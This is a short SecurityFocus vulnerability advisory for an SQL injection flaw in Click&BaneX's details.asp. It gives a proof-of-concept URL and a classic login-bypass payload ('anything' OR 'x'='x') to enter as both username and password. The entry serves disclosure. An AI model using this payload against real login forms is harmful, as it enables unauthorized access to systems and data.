Click&BaneX Details.ASP SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept example is available:

http://www.example.com/index.html?ClickAndRank/details.asp

Username: anything' OR 'x'='x
Password: anything' OR 'x'='x


 

Privacy Statement
Copyright 2010, SecurityFocus